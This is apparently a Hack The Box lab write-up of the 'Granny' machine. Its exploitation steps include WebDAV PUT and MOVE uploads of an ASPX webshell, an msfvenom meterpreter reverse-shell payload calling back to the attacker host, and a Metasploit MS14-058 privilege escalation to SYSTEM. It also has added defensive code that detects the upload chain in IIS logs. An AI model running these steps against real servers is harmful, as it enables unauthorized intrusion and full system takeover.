Granny

Reconnaissance:

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.10.15

80/tcp open  http    Microsoft IIS httpd 6.0
|_http-title: Under Construction
| http-methods: 
|_  Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
|_http-server-header: Microsoft-IIS/6.0
| http-ntlm-info: 
|   Target_Name: GRANNY
|   NetBIOS_Domain_Name: GRANNY
|   NetBIOS_Computer_Name: GRANNY
|   DNS_Domain_Name: granny
|   DNS_Computer_Name: granny
|_  Product_Version: 5.2.3790
| http-webdav-scan: 
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
|   Server Type: Microsoft-IIS/6.0
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|   Server Date: Thu, 14 Dec 2023 02:17:01 GMT
|_  WebDAV type: Unknown


┌──(kali㉿kali)-[~]
└─$ sudo nmap -sU -O 10.10.10.15 
All 1000 scanned ports on 10.10.10.15 are in ignored states.

nmap shows only port 80 open. It’s a website, and the webdav-scan is particularly interesting (I’ll come back to that in a minute):

Enumeration: TCP 80

http://10.10.10.15/

  • Operating systems: Windows Server

  • Web frameworks: Microsoft ASP.NET

  • Web servers: IIS 6.0

The site just says “Under Construction”.

Headers: I’ll also check out the response header:

X-Powered-By: ASP.NET

The X-Powered-By: ASP.NET tells me that aspx files may execute if I can get them onto target.

gobuster: I’ll start looking for paths on this server with gobuster, but it doesn’t find anything interesting:

┌──(kali㉿kali)-[~]
└─$ gobuster dir -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.15/

gobuster dir -w /usr/share/wordlists/dirb/common.txt -l -t 30 -e -k -x .html,.asp,.php -u http://10.10.10.15:80 

gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u http://10.10.10.15 -t 50 -x aspx,txt,html

/images               (Status: 301) [Size: 149] [--> http://10.10.10.15/images/]
/Images               (Status: 301) [Size: 149] [--> http://10.10.10.15/Images/]
/IMAGES               (Status: 301) [Size: 149] [--> http://10.10.10.15/IMAGES/]
/_private             (Status: 301) [Size: 153] [--> http://10.10.10.15/%5Fprivate/]

Both /images and /_private are empty dirs.

┌──(kali㉿kali)-[~]
└─$ nikto -host 10.10.10.15:80 

+ /: Retrieved x-powered-by header: ASP.NET.
+ /nikto-test-L2AWxGEP.html: HTTP method 'PUT' allows clients to save files on the web server. See: https://portswigger.net/kb/issues/00100900_http-put-method-is-enabled
+ /nikto-test-L2AWxGEP.html: HTTP method 'DELETE' allows clients to delete files on the web server. See: https://cwe.mitre.org/data/definitions/650.html
+ HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.

WebDAV

Web Distributed Authoring and Versioning (WebDAV) is an HTTP extension designed to allow people to create and modify web sites using HTTP. It was originally started in 1996, when this didn’t seem like a terrible idea. I don’t see that often on recent HTB machines, but I did come across it in PWK/OSCP. The scan shows that the HTTP PUT method is allowed. This could potentially give us the ability to save files on the web server. Since this is a Microsoft IIS web server, the type of files it executes are ASP and ASPX. So let’s check if we’re allowed to upload these file extensions.

┌──(kali㉿kali)-[~]
└─$ davtest --url http://10.10.10.15

 Sending test files
PUT     shtml   FAIL
PUT     asp     FAIL
PUT     jhtml   SUCCEED:        http://10.10.10.15/DavTestDir_y3QbIHW88/davtest_y3QbIHW88.jhtml
PUT     txt     SUCCEED:        http://10.10.10.15/DavTestDir_y3QbIHW88/davtest_y3QbIHW88.txt
PUT     cfm     SUCCEED:        http://10.10.10.15/DavTestDir_y3QbIHW88/davtest_y3QbIHW88.cfm
PUT     jsp     SUCCEED:        http://10.10.10.15/DavTestDir_y3QbIHW88/davtest_y3QbIHW88.jsp
PUT     php     SUCCEED:        http://10.10.10.15/DavTestDir_y3QbIHW88/davtest_y3QbIHW88.php
PUT     pl      SUCCEED:        http://10.10.10.15/DavTestDir_y3QbIHW88/davtest_y3QbIHW88.pl
PUT     cgi     FAIL
PUT     html    SUCCEED:        http://10.10.10.15/DavTestDir_y3QbIHW88/davtest_y3QbIHW88.html
PUT     aspx    FAIL
********************************************************
 Checking for test file execution
EXEC    jhtml   FAIL
EXEC    txt     SUCCEED:        http://10.10.10.15/DavTestDir_y3QbIHW88/davtest_y3QbIHW88.txt
EXEC    txt     FAIL
EXEC    cfm     FAIL
EXEC    jsp     FAIL
EXEC    php     FAIL
EXEC    pl      FAIL
EXEC    html    SUCCEED:        http://10.10.10.15/DavTestDir_y3QbIHW88/davtest_y3QbIHW88.html
EXEC    html    FAIL

Neither ASP nor ASPX is allowed, but TXT and HTML files are. Remember that PUT was not the only HTTP method that was allowed. We can also use the MOVE method. MOVE not only changes a file’s location on the web server, it can also rename the file. Let’s upload an HTML file to the web server and then rename it so the extension becomes ASPX.
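The PUT-then-MOVE extension swap described above leaves a clear trail in the web server’s logs, because IIS records the method and the URI of every request. The following is an added example for this writeup, not code from the original post: it parses IIS W3C Extended log lines (the field list is the usual IIS 6 default; the log lines, IPs and timestamps are constructed) and flags any content-changing WebDAV method, plus the specific chain of a successful PUT, a MOVE of the same path, and a subsequent 200 on a script extension from the same client. Note that IIS does not log the MOVE Destination header, so the correlation is by source path and client.

```python
"""Detect WebDAV PUT -> MOVE -> execute chains in IIS W3C Extended logs.

Added example for this writeup (not part of the original post). SAMPLE_LOG is
constructed to resemble IIS 6 output; the #Fields line is the common default.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# WebDAV methods that change server content; on a public site with no
# authentication any of these is worth an alert by itself.
WRITE_METHODS = {"PUT", "MOVE", "COPY", "DELETE", "MKCOL", "PROPPATCH"}
# Extensions IIS hands to a script engine (the point of the rename trick).
EXEC_EXTENSIONS = (".asp", ".aspx", ".asa", ".ashx", ".asmx")

# Constructed sample: one client uploads, renames and runs a file; another
# client's PUT is refused with 403.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2023-12-14 03:40:00
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2023-12-14 03:40:01 10.10.10.15 GET / - 80 - 10.10.14.2 curl/8.4.0 200 0 0
2023-12-14 03:40:05 10.10.10.15 PUT /shell.txt - 80 - 10.10.14.2 curl/8.4.0 201 0 0
2023-12-14 03:40:09 10.10.10.15 MOVE /shell.txt - 80 - 10.10.14.2 curl/8.4.0 201 0 0
2023-12-14 03:40:12 10.10.10.15 GET /shell.aspx - 80 - 10.10.14.2 curl/8.4.0 200 0 0
2023-12-14 03:41:00 10.10.10.15 OPTIONS / - 80 - 10.10.14.7 Mozilla/5.0 200 0 0
2023-12-14 03:41:30 10.10.10.15 PUT /notes.txt - 80 - 10.10.14.7 Mozilla/5.0 403 0 0
"""


def parse_w3c(text):
    """Turn W3C Extended log text into a list of dicts keyed by #Fields names."""
    fields = None
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#"):
            if line.startswith("#Fields:"):
                fields = line.split()[1:]
            continue
        if fields is None:
            raise ValueError("data line before #Fields header")
        values = line.split()
        if len(values) != len(fields):
            continue  # skip malformed lines rather than mis-map columns
        row = dict(zip(fields, values))
        row["ts"] = datetime.strptime(row["date"] + " " + row["time"], "%Y-%m-%d %H:%M:%S")
        rows.append(row)
    return rows


def detect_webdav_abuse(rows, window=timedelta(minutes=10)):
    """Return findings: every write method, and PUT->MOVE(->GET script) chains per client."""
    findings = []
    by_client = defaultdict(list)
    for r in rows:
        by_client[r["c-ip"]].append(r)
        if r["cs-method"] in WRITE_METHODS:
            findings.append({"kind": "write-method", "client": r["c-ip"], "method": r["cs-method"],
                             "path": r["cs-uri-stem"], "status": r["sc-status"]})
    for client, events in by_client.items():
        events.sort(key=lambda e: e["ts"])
        for i, put in enumerate(events):
            if put["cs-method"] != "PUT" or not put["sc-status"].startswith("2"):
                continue
            later = [e for e in events[i + 1:] if e["ts"] <= put["ts"] + window]
            moved = any(e["cs-method"] == "MOVE" and e["cs-uri-stem"] == put["cs-uri-stem"]
                        and e["sc-status"].startswith("2") for e in later)
            if not moved:
                continue
            executed = [e["cs-uri-stem"] for e in later
                        if e["cs-method"] == "GET" and e["sc-status"] == "200"
                        and e["cs-uri-stem"].lower().endswith(EXEC_EXTENSIONS)]
            findings.append({"kind": "put-move-exec" if executed else "put-move",
                             "client": client, "path": put["cs-uri-stem"], "executed": executed})
    return findings


if __name__ == "__main__":
    for f in detect_webdav_abuse(parse_w3c(SAMPLE_LOG)):
        print(f)
```

The `write-method` findings are the cheap, high-volume signal (on this box every PUT/MOVE/DELETE is from an anonymous client, so all of them are anomalies); the `put-move-exec` finding is the one that maps directly to the technique in this section and deserves the page.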

┌──(kali㉿kali)-[~/Desktop]
└─$ curl -X PUT http://10.10.10.15/test.html -d @test.html
                                                                                              
┌──(kali㉿kali)-[~/Desktop]
└─$ curl http://10.10.10.15/test.html
<h1>Hello</h1>    

We confirm that the HTML file was correctly uploaded on the web server. Next, let’s change the extension of the HTML file to ASPX.

┌──(kali㉿kali)-[~/Desktop]
└─$ curl -X MOVE --header 'Destination:http://10.10.10.15/test.aspx' 'http://10.10.10.15/test.html'
                                                                                              
┌──(kali㉿kali)-[~/Desktop]
└─$ curl http://10.10.10.15/test.aspx
<h1>Hello</h1>  

Foothold:

Upload Webshell: The first thing I’ll need to do is upload my webshell. Kali has a simple one at /usr/share/webshells/aspx/cmdasp.aspx. I’ll grab a copy:

┌──(kali㉿kali)-[~/Desktop]
└─$ cp /usr/share/webshells/aspx/cmdasp.aspx .

Now I’ll upload that to target as a txt using curl and the http put method:

┌──(kali㉿kali)-[~/Desktop]
└─$ curl -X PUT http://10.10.10.15/shell.txt -d @cmdasp.aspx 

If I look at the page now, I’ll see the code, but it isn’t executed, as the server treats it as text.

Move Webshell: Now I’ll use the next webdav command, MOVE. Again, I can do this with curl:

┌──(kali㉿kali)-[~/Desktop]
└─$ curl -X MOVE -H 'Destination:http://10.10.10.15/shell.aspx' http://10.10.10.15/shell.txt

http://10.10.10.15/shell.aspx
whoami
nt authority\network service

Meterpreter: I’ll do the same thing with a meterpreter payload. Create it:

┌──(kali㉿kali)-[~/Desktop]
└─$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.2 LPORT=443 -f aspx > shelly.aspx

Upload:
┌──(kali㉿kali)-[~/Desktop]
└─$ curl -X PUT http://10.10.10.15/shelly.txt -d @shelly.aspx 

┌──(kali㉿kali)-[~/Desktop]
└─$ curl -X MOVE -H 'Destination: http://10.10.10.15/shelly.aspx' http://10.10.10.15/shelly.txt

Start Metasploit:

┌──(kali㉿kali)-[~]
└─$ msfconsole  

msf6 > use exploit/multi/handler 
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST tun0
msf6 exploit(multi/handler) > set lport 443
msf6 exploit(multi/handler) > options
msf6 exploit(multi/handler) > run

Trigger it, and it fails:

http://10.10.10.15/shelly.aspx

Why? If I upload shelly.txt again and view it, I can see that the whitespace is all jacked up. I’ll upload again, this time using --data-binary to preserve newlines and other control characters:
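The failure comes from how curl reads the file: `-d @file` strips carriage returns and newlines from the file before sending it, while `--data-binary @file` sends the bytes untouched. The following is an added example, not code from the original writeup, that models both modes on a constructed ASPX-like sample and shows the integrity check (size and SHA-256 comparison against what the server stored) that would have caught the corrupted upload before triggering it. The sample page and its contents are made up; only its line structure matters.

```python
"""Model of curl -d versus --data-binary file handling, plus an upload integrity check.

Added example, not part of the original writeup. Constructed sample below.
"""
import hashlib
import urllib.request

# Constructed stand-in for a generated ASPX page with CRLF line endings.
SAMPLE_ASPX = (
    b'<%@ Page Language="C#" %>\r\n'
    b'<script runat="server">\r\n'
    b'    // a line comment: with the newline gone, C# treats everything after it as comment\r\n'
    b'    void Page_Load(object s, EventArgs e) { }\r\n'
    b'</script>\r\n'
)


def curl_data_ascii(body: bytes) -> bytes:
    """What `curl -d @file` transmits: CR and LF bytes removed."""
    return body.replace(b"\r", b"").replace(b"\n", b"")


def curl_data_binary(body: bytes) -> bytes:
    """What `curl --data-binary @file` transmits: the file as-is."""
    return body


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def verify_upload(local: bytes, remote: bytes) -> dict:
    """Compare the file we meant to upload with the bytes the server serves back."""
    return {
        "intact": sha256_hex(local) == sha256_hex(remote),
        "bytes_lost": len(local) - len(remote),
        "lines_local": local.count(b"\n"),
        "lines_remote": remote.count(b"\n"),
    }


def fetch(url: str) -> bytes:
    """Retrieve the stored copy for a real comparison (not used offline)."""
    with urllib.request.urlopen(url, timeout=10) as resp:  # assumption: plain HTTP, no auth
        return resp.read()


if __name__ == "__main__":
    print("-d          :", verify_upload(SAMPLE_ASPX, curl_data_ascii(SAMPLE_ASPX)))
    print("--data-binary:", verify_upload(SAMPLE_ASPX, curl_data_binary(SAMPLE_ASPX)))
```

Running `verify_upload(open("shelly.aspx", "rb").read(), fetch("http://10.10.10.15/shelly.txt"))` after the PUT gives the same check against the real server: a hash mismatch or a zero `lines_remote` count means the payload was mangled in transit and moving it to .aspx is pointless.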

┌──(kali㉿kali)-[~/Desktop]
└─$ curl -X PUT http://10.10.10.15/shelly.txt --data-binary @shelly.aspx 

On refreshing shelly.txt, I see it looks much cleaner. Now I’ll move the file and trigger it:

┌──(kali㉿kali)-[~/Desktop]
└─$ curl -X MOVE -H 'Destination: http://10.10.10.15/shelly.aspx' http://10.10.10.15/shelly.txt 

┌──(kali㉿kali)-[~/Desktop]
└─$ curl http://10.10.10.15/shelly.aspx

And get a shell:
[*] Sending stage (175686 bytes) to 10.10.10.15
[*] Meterpreter session 1 opened (10.10.14.2:443 -> 10.10.10.15:1030) at 2023-12-13 23:46:12 -0500

Privesc:

Enumeration:

On older boxes like this one, I’m more likely to check out local exploits, and Metasploit has a nice module for that, post/multi/recon/local_exploit_suggester:

meterpreter > background
msf6 exploit(multi/handler) > search local_exploit
msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > set session 2
msf6 post(multi/recon/local_exploit_suggester) > run

There’s a lot of stuff to go for.
 1   exploit/windows/local/ms10_015_kitrap0d                        Yes                      The service is running, but could not be validated.                                            
 2   exploit/windows/local/ms14_058_track_popup_menu                Yes                      The target appears to be vulnerable.                                                           
 3   exploit/windows/local/ms14_070_tcpip_ioctl                     Yes                      The target appears to be vulnerable.                                                           
 4   exploit/windows/local/ms15_051_client_copy_image               Yes                      The target appears to be vulnerable.                                                           
 5   exploit/windows/local/ms16_016_webdav                          Yes                      The service is running, but could not be validated.                                            
 6   exploit/windows/local/ms16_075_reflection                      Yes                      The target appears to be vulnerable.                                                           
 7   exploit/windows/local/ppr_flatten_rec                          Yes                      The target appears to be vulnerable.  

MS14-058

I’ll pick one (somewhat at random, though I like this one as it says the target appears to be vulnerable):

msf6 post(multi/recon/local_exploit_suggester) > use windows/local/ms14_058_track_popup_menu
msf6 exploit(windows/local/ms14_058_track_popup_menu) > set session 2
msf6 exploit(windows/local/ms14_058_track_popup_menu) > run

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > cd 'C:\Documents and Settings'
meterpreter > cd 'C:Administrator'
meterpreter > cd 'C:Desktop'
meterpreter > ls
meterpreter > cat root.txt
